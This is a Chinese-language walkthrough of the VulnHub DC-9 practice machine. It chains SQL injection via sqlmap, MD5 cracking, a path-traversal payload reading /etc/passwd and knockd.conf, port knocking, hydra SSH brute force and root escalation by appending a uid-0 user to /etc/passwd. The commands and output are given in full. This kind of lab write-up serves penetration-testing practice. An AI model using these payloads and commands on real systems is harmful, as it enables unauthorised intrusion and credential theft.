這是VulnHub 平台的一個用於練習滲透測試和漏洞利用的靶機,目標是讓滲透測試人員鍛練情資搜集、SQL injection、Local File Injection、爆破技巧及權限提升的技能。該靶機滲透做法如下
情報收集
使用nmap 發現80port 和22Port
# nmap dc9
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))port22出現filtered表示可能使用Port Knocking方法
用SQL injection取得網頁管理員權限
訪問網頁,分析search.php時發現有sqli的漏洞
因為搜尋' or '1'='1時會返回所有記錄
將以下請求儲存成search.request
POST /results.php HTTP/1.1
Host: 192.168.1.7
Content-Length: 11
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.7
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.7/search.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
search=joey使用sqlmap指令如下,發現可injectable
sqlmap -r search.request
透過sqlmap看users帳密
# sqlmap -r search_form.txt --dump -D Staff -T Users
...omit...
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+密碼是md5格式,可以用一些線上工具爆破,例如https://crackstation.net/
爆破後得到密碼 transorbital1
使用admin帳號和密碼可成功登入
用Local File Injection取得系統敏感信息
登入後發現網頁下方有個 File does not exist
有一個參數為file= ,這裡有一個Local File Injection (LFI)漏洞,可以使用以下取得檔案內容
http://dc9/manage.php?file=../../../../../../../etc/passwd
測試etc/knockd.conf也可成功
http://dc9/welcome.php?file=../../../../../../../../etc/knockd.conf
內容顯示如下
[openSSH]
sequence = 7469,8475,9842
seq_timeout = 25
command = /sbin/iptables -I INPUT -s %IP% -p tcp - dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9842,8475,7469
seq_timeout = 25
command = /sbin/iptables -D INPUT -s %IP% -p tcp - dport 22 -j ACCEPT
tcpflags = syn使用nc嘗試存取目標7469,8475,9842,最後在測試port 22可以發現己經打開
$ nc -v dc9 7469
10.0.0.14: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.14] 7469 (?) : Connection refused
$ nc -v dc9 8475
10.0.0.14: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.14] 8475 (?) : Connection refused
$ nc -v dc9 9842
10.0.0.14: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.14] 9842 (?) : Connection refused
$ nc -v dc9 22
10.0.0.14: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.14] 22 (ssh) open
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u1破解SSH帳密
使用sqlmap把可能的username和password列出來
$ sqlmap -r search_form.txt --dump -D users -T UserDetails
...omit...
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
將username儲存在usernames.txt,將passowrd儲存在passwords.txt ,然後使用hydra測試ssh的密碼
$ hydra -L usernames.txt -P passwords.txt dc9 ssh
[DATA] attacking ssh://dc9:22/
[22][ssh] host: dc9 login: chandlerb password: UrAG0D!
[22][ssh] host: dc9 login: joeyt password: Passw0rd
[22][ssh] host: dc9 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found使用janitor登入
$ ssh janitor@dc9
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 Jan 21 07:41 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Jan 21 07:41 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls -la
total 12
drwx------ 2 janitor janitor 4096 Dec 29 2019 .
drwx------ 4 janitor janitor 4096 Jan 21 07:41 ..
-rwx------ 1 janitor janitor 66 Dec 29 2019 passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts將passwords-found-on-post-it-notes.txt內容複制過來,並使用hydra測試發現又有2組帳密可用
$ hydra -L usernames.txt -P passwords-found-on-post-it-notes.txt dc9 ssh
...
[DATA] attacking ssh://dc9:22/
[22][ssh] host: dc9 login: joeyt password: Passw0rd
[22][ssh] host: dc9 login: fredf password: B4-Tru3-001
1 of 1 target successfully completed, 2 valid passwords foundPrivilege Escalation
使用fredf登入 , 用sudo -l發現/opt/devstuff/dist/test/test有高權限
$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
$ cd /opt/devstuff/dist/test
/opt/devstuff/dist/test$ ./test
Usage: python test.py read append
/opt/devstuff/dist/test$ find / -name "test.py" -type f 2>/dev/null
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py檔案/opt/devstuff/test.py內容如下,功能是可以將第一個指定檔案內容放在第二個指定檔案的後面
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()先在攻擊機製做一個密碼加密字串
# openssl passwd -1 -salt salt password123
$1$salt$/3NHsNrNmNbOO90IOW9dw/在根據/etc/passwd格式製作一個新使用者g0tmarks的字串,並存在/tmp/user.txt
$ echo 'g0tmarks:$1$salt$/3NHsNrNmNbOO90IOW9dw/:0:0::/root:/bin/bash' > /tmp/user.txt
$ cat /tmp/user.txt
g0tmarks:$1$salt$/3NHsNrNmNbOO90IOW9dw/:0:0::/root:/bin/bash然後透過/opt/devstuff/dist/test/test將/tmp/user.txt內容附加在/etc/passwd後面
$ sudo /opt/devstuff/dist/test/test /tmp/user.txt /etc/passwd
$ tail /etc/passwd
...omit...
g0tmarks:$1$salt$/3NHsNrNmNbOO90IOW9dw/:0:0::/root:/bin/bash
$ su g0tmarks
# cat theflag.txt成功後可用新使用者帳號登入,就能顯示theflag.txt內容
refer
https://hummus-ful.github.io/vulnhub/2021/01/22/DC-9.html
https://systemweakness.com/vlunhub-dc-9-a80d55b27d0a